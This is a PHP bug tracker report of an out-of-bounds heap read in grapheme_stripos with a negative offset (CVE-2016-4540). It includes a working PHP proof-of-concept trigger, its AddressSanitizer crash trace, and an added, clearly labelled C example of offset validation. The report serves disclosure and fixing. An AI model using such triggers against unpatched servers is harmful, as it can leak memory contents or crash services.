Out-of-bounds reads in zif_grapheme_stripos with negative offset
| Sec Bug #72061 | Out-of-bounds reads in zif_grapheme_stripos with negative offset | | |
|---|---|---|---|
| Submitted: | 2016-04-20 07:22 UTC | Modified: | 2016-05-06 06:45 UTC |
| From: | fernando at null-life dot com | Assigned: | stas |
| Status: | Closed | Package: | intl (PECL) |
| PHP Version: | 5.5.34 | OS: | Linux |
| Private report: | No | CVE-ID: | 2016-4540 |
[2016-04-20 07:22 UTC] fernando at null-life dot com
Description:
------------
Run with PHP/ASAN
The offset parameter reads from arbitrary memory when a negative value is passed and the first parameter is an array element.
Test script:
---------------
```php
<?php
$vals = [ 1, 1, 1, 1, 1, 1, 1,1, 1, 1, 1, 1, 1, 1,1,1, 1, 1, 1, 1, 1, 1,1,1, 1,1, 1, 1, 1, 1, 1,1, 1, 1, 1,1,1,1,1,
1,1,1, 1, 1, 1,1,1, 1, 1, 1, 1 , 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,1, 1,1, 1,1,1, 1 ,
str_repeat("ABCD", 16384) ];
grapheme_stripos($vals[76], "A", -201);
```
Expected result:
----------------
no crash
Actual result:
--------------
```text
==16765==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb0ebf747 at pc 0xb71b3c35 bp 0xbff95058 sp 0xbff94c2c
READ of size 202 at 0xb0ebf747 thread T0
    #0 0xb71b3c34 (/usr/lib/i386-linux-gnu/libasan.so.2+0x37c34)
    #1 0xaf8e42c5 in zend_memnstr /home/fmunozs/phpgit/php56/Zend/zend_operators.h:280
    #2 0xaf8e42c5 in zif_grapheme_stripos /home/fmunozs/phpgit/php56/ext/intl/grapheme/grapheme_string.c:222
    #3 0x9a7c718 in zend_do_fcall_common_helper_SPEC /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:558
    #4 0x9640316 in execute_ex /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:363
    #5 0x9a6c9c8 in zend_execute /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:388
    #6 0x9470b59 in zend_execute_scripts /home/fmunozs/phpgit/php56/Zend/zend.c:1341
    #7 0x91acc6b in php_execute_script /home/fmunozs/phpgit/php56/main/main.c:2613
    #8 0x9a8648a in do_cli /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:994
    #9 0x808a502 in main /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:1378
    #10 0xb6d61645 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18645)
    #11 0x808aaba (/home/fmunozs/phpgit/php56/sapi/cli/php+0x808aaba)

0xb0ebf747 is located 185 bytes to the left of 262144-byte region [0xb0ebf800,0xb0eff800)
allocated by thread T0 here:
    #0 0xb7212d06 in malloc (/usr/lib/i386-linux-gnu/libasan.so.2+0x96d06)
    #1 0x92e8597 in zend_mm_mem_malloc_alloc /home/fmunozs/phpgit/php56/Zend/zend_alloc.c:287
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
```
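Added example, not PHP's source and not the patch that closed this bug: a C search routine that maps a signed offset onto the haystack length and rejects out-of-range values before any pointer is built. It assumes, from the trace above (a 202-byte read starting left of the copied haystack for an offset of -201), that the vulnerable path applied the raw negative offset to the haystack pointer; the function names, return codes and sample input are constructed for this example.

```c
#include <ctype.h>
#include <limits.h>
#include <stddef.h>
#include <string.h>

#define GSTRIPOS_NOT_FOUND  (-1L)   /* needle absent at or after the offset */
#define GSTRIPOS_BAD_OFFSET (-2L)   /* offset outside [-hay_len, hay_len] */

/* Map a PHP-style signed offset onto [0, hay_len]; negative values count from
 * the end. Out-of-range offsets are rejected before any pointer is built, so
 * "hay + offset" is never formed from a raw negative offset (the assumed bug). */
static int normalize_offset(long offset, size_t hay_len, size_t *start)
{
    if (offset < 0) {
        /* magnitude via unsigned wraparound: well defined even for LONG_MIN */
        unsigned long mag = 0UL - (unsigned long)offset;
        if (mag > hay_len) return 0;
        *start = hay_len - mag;
    } else {
        if ((unsigned long)offset > hay_len) return 0;
        *start = (size_t)offset;
    }
    return 1;
}

/* ASCII case-insensitive search for needle in hay[start..hay_len); returns the
 * byte index of the first match. Every byte touched lies inside hay. */
long gstripos(const char *hay, size_t hay_len,
              const char *needle, size_t needle_len, long offset)
{
    size_t start, i, j;
    if (!normalize_offset(offset, hay_len, &start)) return GSTRIPOS_BAD_OFFSET;
    if (needle_len == 0 || needle_len > hay_len - start) return GSTRIPOS_NOT_FOUND;
    for (i = start; i + needle_len <= hay_len; i++) {
        for (j = 0; j < needle_len; j++)
            if (tolower((unsigned char)hay[i + j]) !=
                tolower((unsigned char)needle[j])) break;
        if (j == needle_len) return (long)i;
    }
    return GSTRIPOS_NOT_FOUND;
}

/* The reporter's input, constructed here: "ABCD" x 16384 bytes, needle "A",
 * offset -201: search starts at byte 65335 ('D'), first 'A' after it is 65336. */
long demo_report_input(void)
{
    static char hay[4 * 16384];
    for (size_t i = 0; i < sizeof hay; i += 4) memcpy(hay + i, "ABCD", 4);
    return gstripos(hay, sizeof hay, "A", 1, -201);   /* returns 65336 */
}
```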
History
[2016-04-24 19:41 UTC] stas@php.net
-Summary: AddressSanitizer: heap-buffer-overflow zif_grapheme_stripos +Summary: Out-of-bounds reads in zif_grapheme_stripos with negative offset
[2016-04-24 19:41 UTC] stas@php.net
-PHP Version: 5.6.20 +PHP Version: 5.5.34
[2016-04-24 20:17 UTC] stas@php.net
-Assigned To: +Assigned To: stas
[2016-04-25 03:36 UTC] fernando at null-life dot com
[2016-04-27 05:56 UTC] stas@php.net
-Status: Assigned +Status: Closed
[2016-05-06 06:45 UTC] remi@php.net
-CVE-ID: +CVE-ID: 2016-4540